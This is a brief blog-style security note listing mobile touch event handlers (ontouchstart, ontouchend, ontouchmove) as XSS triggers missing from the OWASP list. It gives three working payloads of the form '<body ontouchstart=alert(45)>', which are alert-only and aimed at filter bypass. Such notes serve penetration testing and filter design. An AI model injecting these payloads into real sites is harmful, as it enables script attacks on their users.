Event handler for mobile used in XSS (ontouch*)

Some event handlers do not appear in the OWASP list. It is a touch event like ontouch*. It is a limited item on mobile devices, so it has a less effective effect than general purpose, but it is a good item to trigger XSS.

(In fact, sometimes I forgot this event handler. so i take a note!)

<body ontouchstart=alert(45)> 
<body ontouchend=alert(45)>   
<body ontouchmove=alert(45)>  
<!-- 

[ ontouchstart ]
Triggers when a finger touch the screen

[ ontouchend ]
Triggers when a finger is removed from touch screen

[ ontouchmove ]
When a finger is dragged across the screen. 

-->

only mobile…, pc browser is not running code
Licensed under CC BY-NC-SA 4.0
Last updated on Jul 10, 2021 01:05 +0900